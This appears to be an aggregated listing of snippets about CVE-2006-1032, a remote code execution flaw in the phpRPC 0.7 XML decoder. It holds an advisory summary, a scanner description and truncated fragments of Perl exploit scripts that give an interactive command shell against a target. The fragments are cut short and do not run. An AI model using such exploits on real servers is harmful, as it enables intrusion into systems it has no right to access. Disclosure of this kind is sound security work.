phpRPC decode function command execution

Added: 03/13/2006 CVE: CVE-2006-1032 BID: 16833 OSVDB: 23514 Background phpRPC is an xmlrpc library written in PHP supporting most databases. Problem A vulnerability in the decode function allows a remote attacker to execute arbitrary PHP commands placed inside a tag. Resolution phpRPC is no long...

phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)

!/usr/bin/perl phpRPC All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ $Id: cijfer-prpcxpl.pl,v 0.1 2006/03/01 05:46:00 cijfer Exp $ use LWP::UserAgent; use URI::Escape; use Getopt::Long; use Term::ANSIColor; $res =...

phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2)

Exploit for unknown platform in category web applications ================================================================= phpRPC Library $host, "proxy=s" = $proxy, "verbose+" = $verbose; &usage unless $host; while print color"green", "cijfer$ ", color"reset"; chomp$command = ; exit unless...

phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution

Exploit for unknown platform in category web applications ============================================================= phpRPC Library new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "connecterror\n"; while 1 print 'IRAN HOMELAND SECURITY$ '; $cmd = ; chop$cmd; last if $cmd eq 'exit...

phpRPC Library rpc_decoder.php decode() Function Arbitrary Code Execution

The remote host has installed on it the phpRPC library, an xmlrpc library written in PHP and bundled with applications such as RunCMS and exoops. The version of phpRPC on the remote host fails to sanitize user input to the 'server.php' script before using it in an 'eval' function, which may allow...